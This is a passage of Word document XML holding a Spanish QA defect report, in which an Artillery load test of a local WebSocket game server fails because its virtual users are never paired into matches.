              <w:t xml:space="preserve">PC, 16GB RAM, Intel Core i5 · Node.js 20 · Artillery v2.0.32</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sistema operativo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Navegador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Google Chrome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resolución</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1920x1080</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Comentarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Detectado en TC-R-02 — Rendimiento WebSocket concurrente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Nombre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Artillery ECONNRESET en movidas WebSocket — VU no puede emparejarse consigo mismo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-R-02 usa Artillery con 20 VUs independientes que intentan enviar moves pero el servidor WebSocket requiere que dos jugadores estén emparejados. Un VU solo no puede hacer moves porque no hay oponente, y el servidor cierra la conexión con ECONNRESET.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Encargado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Andrés Gustavo Arias Ruiz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Prioridad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Precondiciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Backend con WebSocket activo en ws://localhost:4000/ws.
2. Artillery con engine WebSocket configurado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pasos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. npx artillery run tc-r-02-ws-move-carga.yml (20 VUs).
2. Cada VU: join → move × 3 → ping.
3. Observar errores en reporte JSON.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado esperado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Tasa de error &lt; 1%. 20/20 VUs completados sin ECONNRESET.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado obtenido</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">120/120 VUs fallaron (100%). ECONNRESET=120, socket hang up=120. El servidor cierra la conexión al recibir moves de clientes sin partida activa.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Notas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Causa raíz: El diseño del test no contempla que WebSocket requiere emparejamiento previo. Artillery lanza VUs independientes que no pueden hacer match entre sí.
Limitación del test (no del sistema): El sistema funciona correctamente en partidas reales; la falla es de diseño del escenario de carga.
Correción del test: Diseñar escenario con pares sincronizados usando Artillery "shared state" o un coordinador externo que cree las salas antes del test.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
      <w:pgMar w:top="720" w:right="72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2026-06-03T19:00:30.126Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-03T19:00:30.126Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>